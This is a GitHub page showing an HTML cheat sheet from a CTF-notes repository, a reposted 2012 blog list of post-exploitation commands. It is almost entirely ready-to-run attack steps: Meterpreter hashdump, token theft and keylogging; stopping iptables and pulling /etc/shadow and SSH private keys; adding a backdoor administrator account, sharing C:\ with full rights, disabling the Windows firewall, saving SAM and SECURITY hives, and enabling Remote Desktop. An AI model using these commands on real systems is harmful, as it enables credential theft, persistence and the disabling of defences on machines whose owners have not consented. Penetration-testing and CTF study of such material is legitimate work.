forked from Shiva108/CTF-notes
-
Notifications
You must be signed in to change notification settings - Fork 0
/
post_exploit_commands.html
103 lines (84 loc) · 2.48 KB
/
post_exploit_commands.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
<h1>Post Exploit Commands</h1>
<i>Published February 7, 2012 | By phillips321</i>
Credit for most of the below comes from Mubix who has created a few documents
(on google docs) that lists what to actually do once shell access has been gained.
You can read more about it here and find the links to the docs,
I’m simply blogging about it to make a summary of this for myself.
Meterpreter Post Auth
<h2>Information Gathering</h2>
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets
<h2>Escalating Privs</h2>
ps then migrate
getsystem
Tokens (use incognito)
list_tokens -u
impersonate_token
steal_token [pid]
rev2self
Retrieve Passwords
hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
Session
enumdesktops
getdesktop
setdesktop
uictl disable keyboard
Keylog
keyscan_start
keyscan_dump
keyscan_stop
Nix Post Auth
Disable Firewall
/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules
Files to pull
/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/groups OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers
User Information
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
<h2>Windows Post Auth</h2>
Get current logged in user
@echo %USERNAME%
Add user
net user pentest password /add
net localgroup administrators pentest /add
Add share
net share nothing$=C:\ /grant:pentest,FULL /unlimited
Disable Firewall
netsh firewall set opmode disable
Auto Start Directories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\wmiOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\
Accounts and Policies
net localgroup administrators OR net localgroup administrators /domain
net group “Domain Admins” /domain
net accounts ## or net accounts /domain
Files to pull
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive
Enable Remote Desktop
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f